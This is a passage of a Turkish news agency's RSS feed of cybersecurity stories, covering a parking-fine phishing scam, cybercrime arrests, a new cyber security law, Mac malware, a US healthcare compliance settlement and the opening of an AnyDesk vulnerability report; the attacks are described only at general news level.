<p><img src="https://beykozunsesi.com.tr/uploads/images/202503/image_870x_67ce4aa8bdc02.webp" alt=""></p>
<p data-start="1042" data-end="1088"><strong data-start="1042" data-end="1086">Sahte Sitelerle Bilgiler Ele Geçiriliyor</strong></p>
<p data-start="1090" data-end="1394">Dolandırıcılar, kullanıcıları kandırmak için Google’ın açık yönlendirme (open redirect) özelliğini kullanıyor. Güvenilir bir alan adı olan Google.com üzerinden yönlendirme yapıldığı için, iPhone’larda iMessage tarafından engellenmeyen bu bağlantılar, kullanıcıları sahte ödeme sitelerine yönlendiriyor.</p>
<p data-start="1396" data-end="1680">Örneğin, New York için oluşturulan sahte web sitesi "nycparkclient[.]com" adresi üzerinden hizmet veriyor gibi görünüyor. Kullanıcılar, isimlerini ve posta kodlarını girdiklerinde, borçlu oldukları iddia edilen tutar ekrana getiriliyor ve "Ödeme Yap" butonuna tıklamaları isteniyor.</p>
<p data-start="1682" data-end="1900">Ancak dolandırıcılığın en belirgin işaretlerinden biri, ödeme ekranındaki yazım hataları. ABD’de genellikle dolar işareti ($) rakamın önüne yazılırken, bu sahte sitelerde rakamın sonuna eklenmiş şekilde kullanılıyor.</p>
<p data-start="1902" data-end="1949"><strong data-start="1902" data-end="1947">Kredi Kartı ve Kişisel Bilgiler Çalınıyor</strong></p>
<p data-start="1951" data-end="2180">Kurbanlar ödeme adımına geçtiğinde, dolandırıcılar isim, adres, telefon numarası, e-posta ve kredi kartı bilgilerini talep ediyor. Bu veriler, kimlik hırsızlığı, finansal dolandırıcılık ve diğer siber suçlarda kullanılabiliyor.</p>
<p data-start="2182" data-end="2366">Yetkililer, beklenmedik bir numaradan gelen mesajlara karşı dikkatli olunması, şüpheli bağlantılara tıklanmaması ve bu tür mesajların yetkililere bildirilmesi gerektiğini vurguluyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Sosyal medyada çocuk istismarı görüntülerini satanlara operasyon: 103 şüpheli yakalandı!</title>
            <link>https://cumha.com.tr/sosyal-medyada-cocuk-istismari-goeruntulerini-satanlara-operasyon-103-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/sosyal-medyada-cocuk-istismari-goeruntulerini-satanlara-operasyon-103-supheli-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanlığı, 8 il merkezli olarak düzenlenen ve 28 ili kapsayan operasyonda yasa dışı bahis, nitelikli dolandırıcılık ve çevrimiçi çocuk istismarı suçlarına karışan 103 kişinin yakalandığını açıkladı. Operasyon kapsamında milyonlarca lira değerindeki mal varlıklarına el konuldu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67c93d3f9a134.webp" length="35218" type="image/webp"/>
            
            <pubDate>Thu, 06 Mar 2025 09:50:12 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>Siber suç operasyonlarında kaç kişi yakalandı, şüpheliler hangi suçlarla bağlantılıydı, operasyonlarda hangi mal varlıklarına el konuldu, İçişleri Bakanlığı siber suçlara karşı hangi uyarılarda bulundu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="431" data-end="434">İçişleri Bakanı Ali Yerlikaya, sosyal medya hesabından yaptığı açıklamada, yasa dışı bahis, nitelikli dolandırıcılık ve çevrimiçi çocuk istismarı suçlarına yönelik geniş çaplı bir operasyon gerçekleştirildiğini duyurdu.</p>
<p></p>
<p data-start="657" data-end="863"><strong data-start="657" data-end="689">28 ilde eş zamanlı operasyon</strong><br data-start="689" data-end="692">Kocaeli, Ankara, Kayseri, Adana, Zonguldak, Aksaray, İstanbul ve İzmir merkezli olmak üzere toplam 28 ilde gerçekleştirilen operasyonlarda, 103 şüpheli gözaltına alındı.</p>
<p data-start="865" data-end="1266">Yakalanan şahısların, sosyal medya platformları ve oltalama (phishing) siteleri üzerinden <strong data-start="955" data-end="1036">bungalov ve kapora dolandırıcılığı, yatırım vaadiyle yüksek kazanç teklifleri</strong> sunarak insanları dolandırdığı tespit edildi. Ayrıca, yasa dışı bahis sitelerinin finans yönetimini sağlayan suç örgütü üyelerinin, elde ettikleri paraları paravan şirketler ve kripto varlıklar üzerinden akladıkları belirlendi.</p>
<p data-start="1268" data-end="1509"><strong data-start="1268" data-end="1316">Milyonlarca liralık mal varlığına el konuldu</strong><br data-start="1316" data-end="1319">Operasyon kapsamında <strong data-start="1340" data-end="1473">250 milyon TL değerinde 13 araç, 3 villa, 3 şirket, İstanbul ve Aydın’da bulunan 2 otel, 7,5 milyon dolar değerinde kripto varlık</strong> ile banka hesaplarına el konuldu.</p>
<p data-start="1511" data-end="1633">Baskınlarda <strong data-start="1523" data-end="1616">ruhsatsız tabancalar, yüklü miktarda döviz ve Türk Lirası ile çok sayıda dijital materyal</strong> ele geçirildi.</p>
<p data-start="1635" data-end="1974"><strong data-start="1635" data-end="1664">Bakan Yerlikaya’dan uyarı</strong><br data-start="1664" data-end="1667">İçişleri Bakanı Ali Yerlikaya, vatandaşları siber suçlara karşı dikkatli olmaya çağırarak, ‘Tanımadığınız kişilere para göndermeyin, kolay kazanç vaat eden tekliflere inanmayın. Siber suçlara karşı en güçlü kalkan farkındalıktır. Şüpheli durumları 112 Acil Çağrı Merkezi'ne bildirin’ ifadelerini kullandı.</p>
<p data-start="1976" data-end="2196"><strong data-start="1976" data-end="1988"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Kanunu Teklifi, TBMM Genel Kurulunda Kabul Edildi: Kritik Altyapılar ve Siber Saldırılara Karşı Yeni Önlemler</title>
            <link>https://cumha.com.tr/siber-guvenlik-kanunu-teklifi-tbmm-genel-kurulunda-kabul-edildi-kritik-altyapilar-ve-siber-saldirilara-karsi-yeni-onlemler</link>
            <guid>https://cumha.com.tr/siber-guvenlik-kanunu-teklifi-tbmm-genel-kurulunda-kabul-edildi-kritik-altyapilar-ve-siber-saldirilara-karsi-yeni-onlemler</guid>
            <description><![CDATA[ TBMM Genel Kurulu&#039;nda kabul edilen Siber Güvenlik Kanunu Teklifi, Türkiye&#039;nin siber güvenliğini güçlendirecek ve kritik altyapıları koruyacak yeni düzenlemeler getiriyor. Siber saldırılara karşı alınacak tedbirler ve Siber Güvenlik Başkanlığı&#039;nın görevleri belirleniyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67c93d49d60a3.webp" length="117892" type="image/webp"/>
            
            <pubDate>Thu, 06 Mar 2025 09:25:03 +0300</pubDate>
            <dc:creator>Ali Öztürk</dc:creator>
            <media:keywords>Yeni Siber Güvenlik Kanunu&#039;nun kapsamı nedir, Siber Güvenlik Başkanlığı&#039;nın görevleri nelerdir, Siber Güvenlik Kurulu kimlerden oluşacak, Siber güvenlikte yerli ve milli ürünlerin kullanımı nasıl teşvik edilecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="445" data-end="1081"><strong data-start="445" data-end="505">Siber Güvenlik Kanunu Teklifi Genel Kurulda Kabul Edildi</strong><br data-start="505" data-end="508">Türkiye Büyük Millet Meclisi (TBMM) Genel Kurulunda, Siber Güvenlik Kanunu Teklifi'nin 13 maddesi kabul edildi. Düzenleme, Türkiye Cumhuriyeti'nin siber güvenliğini artırmayı hedefliyor ve siber saldırılara karşı alınacak önlemleri içeriyor. Bu yasal düzenleme ile, Türkiye'nin siber uzaydaki milli gücünü oluşturan unsurların korunması, mevcut ve potansiyel tehditlerin tespit edilmesi ve bertaraf edilmesi amaçlanıyor. Ayrıca, kamu kurumları, tüzel kişiler ve diğer ilgili kuruluşların siber saldırılara karşı güvenliğinin artırılması için gerekli düzenlemeler yapılacak.</p>
<p data-start="1083" data-end="1790"><strong data-start="1083" data-end="1135">Siber Güvenlik Başkanlığı'nın Görev ve Yetkileri</strong><br data-start="1135" data-end="1138">Teklif, Siber Güvenlik Başkanlığı'nın görevlerini de tanımlıyor. Başkanlık, kritik altyapıların siber dayanıklılığını artıracak ve siber saldırılara karşı korunma sağlamak için çeşitli faaliyetler yürütecek. Ayrıca, Siber Güvenlik Başkanlığı, zafiyet testleri, sızma testleri, siber tehdit istihbaratı elde etme ve zararlı yazılımlar üzerinde inceleme yapacak. Başkanlık, kritik altyapıların veri envanteri dahil olmak üzere tüm varlıklarının envanterini tutacak ve bunlara yönelik risk analizleri gerçekleştirecek. Ayrıca, kamu kurumlarının siber güvenliğini sağlamak amacıyla gerekli altyapıları kuracak ve güvenli sistemler üzerinden hizmet verecek.</p>
<p data-start="1792" data-end="2087"><strong data-start="1792" data-end="1827">Siber Güvenlik Kurulu Kurulacak</strong><br data-start="1827" data-end="1830">Kanunla, Siber Güvenlik Kurulu'nun kurulması da öngörülüyor. Kurul, Cumhurbaşkanı, Cumhurbaşkanı Yardımcısı, Adalet Bakanı ve diğer yetkililerden oluşacak. Bu kurul, siber güvenlik politikalarının oluşturulmasında ve uygulanmasında kritik bir rol oynayacak.</p>
<p data-start="2089" data-end="2462"><strong data-start="2089" data-end="2128">Yeni Düzenlemeler ve Yasal Yetkiler</strong><br data-start="2128" data-end="2131">Teklif ile Siber Güvenlik Başkanlığı'nın, denetim ve denetimle ilgili olarak önemli yetkiler elde etmesi sağlanacak. Başkanlık, siber güvenlik ürün ve hizmetlerinin denetiminden sorumlu olacak ve gerektiğinde yaptırımlar uygulayacak. Ayrıca, siber olaylara müdahale ve koordinasyon çalışmaları da Başkanlık tarafından yürütülecek.</p>
<p data-start="2464" data-end="2894"><strong data-start="2464" data-end="2510">Siber Güvenlik Politikaları ve Stratejiler</strong><br data-start="2510" data-end="2513">Siber güvenlik çalışmalarında yerli ve milli ürünlerin tercih edilmesi hedefleniyor. Bu düzenleme, aynı zamanda siber güvenlik kültürünün toplum genelinde yaygınlaştırılmasını ve siber güvenlik alanında nitelikli insan kaynağının artırılmasını teşvik edecek. Hukukun üstünlüğü, insan hakları ve mahremiyetin korunması ilkeleri de bu düzenlemenin temel ilkeleri arasında yer alacak.</p>
<p data-start="2896" data-end="3122"><strong data-start="2896" data-end="2908"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Tehditler Giderek Büyüyor: Kurumsal ve Kişisel Veriler Risk Altında</title>
            <link>https://cumha.com.tr/siber-tehditler-giderek-buyuyor-kurumsal-ve-kisisel-veriler-risk-altinda</link>
            <guid>https://cumha.com.tr/siber-tehditler-giderek-buyuyor-kurumsal-ve-kisisel-veriler-risk-altinda</guid>
            <description><![CDATA[ Siber saldırı yöntemleri sürekli evrilerek hem bireyleri hem de kurumları tehdit etmeye devam ediyor. Fidye yazılımlar, kimlik avı saldırıları ve yapay zeka destekli dolandırıcılıklar hızla artarken, siber güvenlik uzmanları yeni korunma stratejileri geliştirme çabasında. Peki, en güncel siber tehditler neler ve bu tehditlere karşı hangi önlemler alınmalı? ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67c16d1e727e2.webp" length="82980" type="image/webp"/>
            
            <pubDate>Fri, 28 Feb 2025 20:01:29 +0300</pubDate>
            <dc:creator>Ali Öztürk</dc:creator>
            <media:keywords>En güncel siber tehditler neler, fidye yazılımlar nasıl çalışıyor, yapay zeka destekli dolandırıcılıklara karşı nasıl önlem alınmalı, kurumsal siber güvenlik stratejileri neler</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="492" data-end="923">Son yıllarda siber saldırılar, daha sofistike ve karmaşık hale gelerek hem bireysel kullanıcıları hem de büyük şirketleri ciddi risklerle karşı karşıya bırakıyor. Özellikle finans sektörü, sağlık kuruluşları ve devlet kurumları, hackerların en fazla hedef aldığı alanlar arasında yer alıyor. Uzmanlar, gelişen tehditlere karşı önlem alınmazsa veri ihlallerinin büyük mali kayıplara ve itibar kaybına yol açabileceğini belirtiyor.</p>
<h3 data-start="925" data-end="961"><strong data-start="929" data-end="959">Yeni Nesil Siber Tehditler</strong></h3>
<p data-start="962" data-end="1105">Siber suçlular, gelişen teknolojiyle birlikte saldırı tekniklerini de sürekli güncelliyor. Son dönemde öne çıkan bazı siber tehditler şunlar:</p>
<ul data-start="1107" data-end="1981">
<li data-start="1107" data-end="1366"><strong data-start="1109" data-end="1151">Yapay Zeka Destekli Dolandırıcılıklar:</strong> Yapay zeka kullanılarak oluşturulan sahte ses ve görüntülerle kimlik avı saldırıları daha inandırıcı hale geliyor. Özellikle büyük şirketlerin yöneticileri hedef alınarak finansal dolandırıcılık vakaları artıyor.</li>
<li data-start="1367" data-end="1572"><strong data-start="1369" data-end="1404">Fidye Yazılımları (Ransomware):</strong> Sistemleri kilitleyerek verileri şifreleyen saldırganlar, fidye talep ediyor. Büyük kurumlar, veri kaybı yaşamamak için milyonlarca dolar ödemek zorunda kalabiliyor.</li>
<li data-start="1573" data-end="1795"><strong data-start="1575" data-end="1607">Tedarik Zinciri Saldırıları:</strong> Şirketlerin çalıştığı üçüncü taraf yazılım ve hizmet sağlayıcıları hedef alınarak sistemlere sızılabiliyor. Bu tür saldırılar, güvenilir firmaları bile dolaylı yoldan tehdit edebiliyor.</li>
<li data-start="1796" data-end="1981"><strong data-start="1798" data-end="1847">IoT (Nesnelerin İnterneti) Güvenlik Açıkları:</strong> Akıllı cihazların yaygınlaşmasıyla birlikte, güvenlik açıklarından yararlanan saldırganlar, ağlara erişerek veri çalmaya çalışıyor.</li>
</ul>
<h3 data-start="1983" data-end="2020"><strong data-start="1987" data-end="2018">Korunma Stratejileri Neler?</strong></h3>
<p data-start="2021" data-end="2118">Siber saldırılara karşı hem bireysel hem de kurumsal düzeyde alınabilecek bazı önlemler şunlar:</p>
<ul data-start="2120" data-end="2868">
<li data-start="2120" data-end="2263"><strong data-start="2122" data-end="2166">Çok Faktörlü Kimlik Doğrulama Kullanımı:</strong> Hesapların güvenliğini artırmak için sadece şifre yerine ek doğrulama yöntemleri kullanılmalı.</li>
<li data-start="2264" data-end="2382"><strong data-start="2266" data-end="2288">Düzenli Yedekleme:</strong> Fidye yazılım saldırılarına karşı verilerin düzenli olarak yedeklenmesi büyük önem taşıyor.</li>
<li data-start="2383" data-end="2519"><strong data-start="2385" data-end="2412">Siber Güvenlik Eğitimi:</strong> Çalışanların kimlik avı saldırılarına karşı bilinçlendirilmesi, saldırıların başarı oranını azaltabilir.</li>
<li data-start="2520" data-end="2670"><strong data-start="2522" data-end="2560">Güncellenmiş Güvenlik Yazılımları:</strong> Antivirüs programları ve güvenlik duvarları sürekli güncellenerek yeni tehditlere karşı korunma sağlanmalı.</li>
<li data-start="2671" data-end="2868"><strong data-start="2673" data-end="2712">Sıfır Güven (Zero Trust) Yaklaşımı:</strong> Şirketlerin, ağlarına bağlanan her kullanıcıya ve cihaza sınırsız erişim vermek yerine, yetkilendirme politikalarıyla kısıtlı erişim sağlaması gerekiyor.</li>
</ul>
<p data-start="2870" data-end="3141">Siber tehditlerin sürekli evrildiği günümüzde, bireylerin ve kurumların proaktif güvenlik önlemleri alması büyük önem taşıyor. Uzmanlar, özellikle kritik altyapıları hedef alan saldırılara karşı daha güçlü savunma mekanizmalarının geliştirilmesi gerektiğini vurguluyor.</p>
<p data-start="3143" data-end="3338"><strong data-start="3143" data-end="3155"></strong></p><br><p><b>Kaynak: <a href="https://cumha.com.tr" target="_blank">CUMHA - CUMHUR HABER AJANSI</a></b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Mac Kullanıcılarını Tehdit Eden İki Yeni Zararlı Yazılım Ortaya Çıktı</title>
            <link>https://cumha.com.tr/mac-kullanicilarini-tehdit-eden-iki-yeni-zararli-yazilim-ortaya-cikti</link>
            <guid>https://cumha.com.tr/mac-kullanicilarini-tehdit-eden-iki-yeni-zararli-yazilim-ortaya-cikti</guid>
            <description><![CDATA[ Mac sistemleri hedef alan iki yeni zararlı yazılım tespit edildi. Bunlardan biri, Parallels sanal makinesindeki bir güvenlik açığını kullanarak saldırganlara root erişimi sağlarken, diğeri ise kullanıcıları kandırarak şifrelerini çalıyor. Apple ve Parallels, güvenlik açıklarını gidermek için güncellemeler üzerinde çalışıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67c153bcae21f.webp" length="21284" type="image/webp"/>
            
            <pubDate>Fri, 28 Feb 2025 17:12:18 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Mac sistemler için yeni güvenlik tehditleri neler, Parallels güvenlik açığı nasıl çalışıyor, FrigidStealer nasıl bulaşıyor, Apple ve Parallels hangi güvenlik önlemlerini alıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="456" data-end="795">Mac sistemler güvenlikleriyle bilinse de zaman zaman yeni tehditlerle karşı karşıya kalabiliyor. Son olarak, güvenlik araştırmacıları tarafından iki yeni zararlı yazılım tespit edildi. Bu yazılımlardan biri, Apple tarafından bu hafta içerisinde yayınlanacak bir güncelleme ile düzeltilirken, diğeri için henüz kesin bir çözüm bulunmuyor.</p>
<p data-start="797" data-end="845"><strong data-start="797" data-end="843">Parallels açığını kullanan zararlı yazılım</strong></p>
<p data-start="847" data-end="1315">Macworld'ün haberine göre, güvenlik araştırmacısı Mickey Jin, Parallels sanal makinesinde bir güvenlik açığı keşfetti. Bu açık, Windows, Linux ve eski macOS sürümlerini çalıştıran Parallels'in güvenlik zafiyetinden kaynaklanıyor. Özellikle Intel tabanlı Mac’leri etkileyen bu güvenlik açığı, saldırganlara root erişimi sağlama potansiyeline sahip. Ancak saldırının gerçekleşmesi için fiziksel erişim gerektiğinden risk seviyesi görece düşük olarak değerlendiriliyor.</p>
<p data-start="1317" data-end="1506">Parallels ekibi, güvenlik açığını kapatmak için çalışmalarını sürdürüyor. Sorunun giderilmesi için Parallels Desktop 20.2.2 ve 19.4.2 sürümlerinin bu hafta içinde yayınlanacağı açıklandı.</p>
<p data-start="1508" data-end="1542"><strong data-start="1508" data-end="1540">Şifre hırsızı: FrigidStealer</strong></p>
<p data-start="1544" data-end="1856">Diğer zararlı yazılım olan FrigidStealer, uzaktan çalıştırılabiliyor ve özellikle şifre hırsızlığına odaklanıyor. Kullanıcıların e-posta yoluyla kandırılmasıyla başlayan saldırı süreci, sahte bir web sayfası aracılığıyla kullanıcının tarayıcısını güncellemesi gerektiğini iddia eden bir mesaj ile devam ediyor.</p>
<p data-start="1858" data-end="2151">Kullanıcı, "Güncelle" butonuna tıkladığında zararlı bir yükleyici Mac cihazına indiriliyor. Gatekeeper güvenliğini aşmak için kullanıcıdan dosyayı "Control" tuşu ile açması isteniyor. Eğer kullanıcı bu adımları uygularsa FrigidStealer aktif hale gelerek cihazdaki şifreleri çalmaya başlıyor.</p>
<p data-start="2153" data-end="2308">Apple ve güvenlik uzmanları, kullanıcıları şüpheli e-postalara karşı dikkatli olmaları ve güncellemeleri resmi kaynaklardan yapmaları konusunda uyarıyor.</p>
<p data-start="2310" data-end="2505"><strong data-start="2310" data-end="2322"></strong></p><br><p><b>Kaynak: <a href="https://cumha.com.tr" target="_blank">CUMHA - CUMHUR HABER AJANSI</a></b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD’li Sağlık Devi Siber Güvenlik İhlali Nedeniyle 11 Milyon Dolar Ödeyecek</title>
            <link>https://cumha.com.tr/abd-saglik-kurulusu-siber-guvenlik-ihlali-ceza</link>
            <guid>https://cumha.com.tr/abd-saglik-kurulusu-siber-guvenlik-ihlali-ceza</guid>
            <description><![CDATA[ ABD’li sağlık devi HNFS, siber güvenlik ihlalleri nedeniyle 11,2 milyon dolar ceza ödüyor! 2015-2018 yıllarında güvenlik önlemlerini uygulamadığı iddia edilen şirketin, yanlış sertifikasyon raporları sunduğu öne sürüldü. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67b7948f77a2d.webp" length="24992" type="image/webp"/>
            
            <pubDate>Fri, 21 Feb 2025 07:46:30 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>HNFS neden ceza ödedi, ABD Adalet Bakanlığı hangi iddialarda bulundu, HNFS hangi güvenlik önlemlerini ihlal etti, yapılan anlaşma şirketleri cezai sorumluluktan kurtarıyor mu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="530" data-end="817">ABD’li sağlık kuruluşu Health Net Federal Services (HNFS) ve ana şirketi Centene Corporation, Savunma Sağlık Ajansı (DHA) ile yapılan TRICARE sözleşmesi kapsamında siber güvenlik önlemlerini yerine getirmediği iddiaları üzerine 11.253.400 dolar ödemeyi kabul etti.</p>
<p data-start="819" data-end="1137">ABD Adalet Bakanlığı tarafından yapılan açıklamaya göre, HNFS, 2015-2018 yılları arasında ABD askeri personeli ve ailelerine yönelik sağlık hizmetleri sunarken, gerekli güvenlik önlemlerini uygulamadı. Ancak şirketin, siber güvenlik standartlarına uygun hareket ettiğine dair yanlış beyanlarda bulunduğu öne sürüldü.</p>
<p data-start="1139" data-end="1412"><strong data-start="1139" data-end="1174">Güvenlik Açıkları Tespit Edildi</strong><br data-start="1174" data-end="1177">Sözleşme gereği, HNFS’nin 48 C.F.R. § 252.204-7012 ve Ulusal Standartlar ve Teknoloji Enstitüsü’nün (NIST) 800-53 sayılı güvenlik kontrollerine uyması gerekiyordu. Ancak şirketin şu temel güvenlik önlemlerini ihmal ettiği belirtildi:</p>
<ul data-start="1414" data-end="1774">
<li data-start="1414" data-end="1495">Sistemlerindeki güvenlik açıklarını taramamak ve zamanında düzeltme yapmamak,</li>
<li data-start="1496" data-end="1574">Denetim raporlarında belirtilen riskleri dikkate almamak ve önlem almamak,</li>
<li data-start="1575" data-end="1674">Varlık yönetimi, erişim kontrolleri, güvenlik duvarı korumaları ve yama yönetimini uygulamamak,</li>
<li data-start="1675" data-end="1733">Güncelliğini yitirmiş donanım ve yazılımlar kullanmak,</li>
<li data-start="1734" data-end="1774">Güçlü parola politikalarına uymamak.</li>
</ul>
<p data-start="1776" data-end="1931">ABD Adalet Bakanlığı, HNFS’nin en az üç farklı tarihte (17 Kasım 2015, 26 Şubat 2016 ve 24 Şubat 2017) hatalı uyumluluk sertifikaları sunduğunu açıkladı.</p>
<p data-start="1933" data-end="2261"><strong data-start="1933" data-end="1964">Şirket Suçlamaları Reddetti</strong><br data-start="1964" data-end="1967">HNFS ve Centene, herhangi bir veri ihlali veya bilgi sızıntısı yaşanmadığını savunsa da anlaşma gereği 11,2 milyon dolarlık cezayı ödemeyi kabul etti. Ancak, anlaşmanın şirketleri gelecekte ortaya çıkabilecek ek deliller karşısında cezai veya idari yaptırımlardan muaf tutmadığı ifade edildi.</p>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Osman Doğan: ‘Kritik Altyapılarda APT Saldırılarına Karşı Zararlı Yazılım Analizi Şart’</title>
            <link>https://cumha.com.tr/kritik-altyapilarda-apt-saldirilari-osman-dogan-zararli-yazilim-analizi</link>
            <guid>https://cumha.com.tr/kritik-altyapilarda-apt-saldirilari-osman-dogan-zararli-yazilim-analizi</guid>
            <description><![CDATA[ Gais Security, Malwation ve MonSpark CEO’su ve kurucu ortağı Osman Doğan, kritik altyapıları hedef alan gelişmiş kalıcı tehditler (APT) konusunda uyarıda bulundu. Doğan’a göre, APT saldırıları büyük finansal kayıplara ve ulusal güvenlik risklerine yol açabilir. Bu saldırılara karşı zararlı yazılım analizi ve tehdit istihbaratı hayati önem taşıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67b63b1d770f9.webp" length="37910" type="image/webp"/>
            
            <pubDate>Thu, 20 Feb 2025 07:13:04 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>APT saldırıları kritik altyapıları nasıl etkiliyor, Osman Doğan zararlı yazılım analizinin önemini nasıl açıklıyor, tehdit istihbaratı siber güvenliğe nasıl katkı sağlar, kritik altyapılar APT saldırılarından nasıl korunabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="497" data-end="889"><a href="https://www.gaissecurity.com/en/home" target="_blank" rel="nofollow noopener">Gais Security</a>, <a href="https://www.malwation.com/" target="_blank" rel="nofollow noopener">Malwation </a>ve <a href="https://www.monspark.com/" target="_blank" rel="nofollow noopener">MonSpark </a>CEO’su ve kurucu ortağı Osman Doğan, kritik altyapılara yönelik gelişmiş kalıcı tehditlerin (APT) artan tehlikesine dikkat çekti. Enerji, sağlık, finans ve ulaşım gibi sektörlerin siber saldırganların öncelikli hedefleri arasında yer aldığını belirten Doğan, bu saldırıların uzun vadeli ve sofistike yöntemlerle büyük zararlar verebileceğini ifade etti.</p>
<p data-start="891" data-end="938"><strong data-start="891" data-end="936">APT saldırılarının yaratabileceği riskler</strong></p>
<p data-start="940" data-end="1098">Osman Doğan, erken tespit edilemeyen APT saldırılarının ciddi sonuçlar doğurabileceğini vurguladı. Bu saldırılar, özellikle aşağıdaki riskleri barındırıyor:</p>
<ul data-start="1100" data-end="1247">
<li data-start="1100" data-end="1136">Operasyonel süreçlerin aksaması,</li>
<li data-start="1137" data-end="1171">Büyük çaplı finansal kayıplar,</li>
<li data-start="1172" data-end="1208">Kurumsal itibarın zarar görmesi,</li>
<li data-start="1209" data-end="1247">Ulusal güvenliğin tehdit edilmesi.</li>
</ul>
<p data-start="1249" data-end="1292"><strong data-start="1249" data-end="1290">Zararlı yazılım analizi neden kritik?</strong></p>
<p data-start="1294" data-end="1579">Doğan’a göre, APT saldırılarıyla mücadelede en önemli unsurlardan biri zararlı yazılım analizi. Sandbox ve dinamik analiz yöntemlerinin kullanımıyla saldırganların tekniklerinin deşifre edilebildiğini belirten Doğan, bu sayede güvenlik önlemlerinin güçlendirilebileceğini ifade etti.</p>
<p data-start="1581" data-end="1629"><strong data-start="1581" data-end="1627">Tehdit istihbaratı proaktif savunma sağlar</strong></p>
<p data-start="1631" data-end="1780">Zararlı yazılım istihbaratının siber güvenlik ekipleri için kritik olduğunu söyleyen Osman Doğan, bu analizlerin şu faydaları sağladığını belirtti:</p>
<ul data-start="1782" data-end="1953">
<li data-start="1782" data-end="1833">Potansiyel tehditler önceden tespit edilebilir,</li>
<li data-start="1834" data-end="1902">Güvenlik ekipleri saldırılara karşı daha hızlı aksiyon alabilir,</li>
<li data-start="1903" data-end="1953">Kritik altyapılar proaktif olarak korunabilir.</li>
</ul>
<p data-start="1955" data-end="2003"><strong data-start="1955" data-end="2001">Siber güvenlikte proaktif yaklaşım zorunlu</strong></p>
<p data-start="2005" data-end="2283">APT saldırılarına karşı etkili bir savunma stratejisi oluşturmak için sadece reaktif çözümlerin yeterli olmayacağını vurgulayan Osman Doğan, sürekli güncellenen zararlı yazılım analizi ve tehdit istihbaratının kritik altyapıları koruma açısından vazgeçilmez olduğunu belirtti.</p>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>AnyDesk Kullananlar Dikkat! Bu Açıkla Bilgisayarınız Ele Geçirilebilir</title>
            <link>https://cumha.com.tr/windows-anydesk-cve-2024-12754-guvenlik-acigi-sistem-yetkisi-ele-gecirme</link>
            <guid>https://cumha.com.tr/windows-anydesk-cve-2024-12754-guvenlik-acigi-sistem-yetkisi-ele-gecirme</guid>
            <description><![CDATA[ Windows&#039;taki AnyDesk uygulamasında kritik bir güvenlik açığı keşfedildi! CVE-2024-12754 koduyla duyurulan bu açık, saldırganların sistem yetkisi elde etmesine olanak tanıyor. Düşük ayrıcalıklı bir kullanıcı, bu zafiyeti kullanarak yönetici hakları kazanabiliyor. Detaylar ve korunma yöntemleri haberimizde! ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67b0f31c4d56d.webp" length="51368" type="image/webp"/>
            
            <pubDate>Sun, 16 Feb 2025 07:03:52 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>AnyDesk CVE-2024-12754 açığı nasıl çalışıyor, AnyDesk güvenlik açığı ile sistem yetkisi nasıl ele geçiriliyor, Windows’ta ShadowCopy mekanizması nasıl kullanılıyor, CVE-2024-12754 için hangi önlemler alınmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="617" data-end="839">Popüler uzaktan erişim yazılımı AnyDesk'te kritik bir güvenlik açığı tespit edildi. CVE-2024-12754 koduyla duyurulan bu açık, saldırganların sistem dosyalarına erişmesini ve yönetici ayrıcalıkları elde etmesini sağlıyor.</p>
<p data-start="841" data-end="898"><strong data-start="841" data-end="896">Dosya Kopyalama Mekanizması Kötüye Kullanılabiliyor</strong></p>
<p data-start="900" data-end="1326">Güvenlik araştırmacısı Naor Hodorov tarafından keşfedilen açık, Windows işletim sisteminde çalışan AnyDesk hizmetinin NT AUTHORITY\SYSTEM yetkileriyle dosya kopyalama işlemi gerçekleştirmesini temel alıyor. AnyDesk, yeni bir oturum başlatıldığında mevcut masaüstü arka planını <code data-start="1177" data-end="1194">C:\Windows\Temp</code> klasörüne kopyalıyor. Bu işlem, düşük ayrıcalıklı bir kullanıcının belirli dosyaları kontrol etmesine ve okumasına imkan tanıyor.</p>
<p data-start="1328" data-end="1379"><strong data-start="1328" data-end="1377">Yetkisiz Dosya Erişimi ve Ayrıcalık Yükseltme</strong></p>
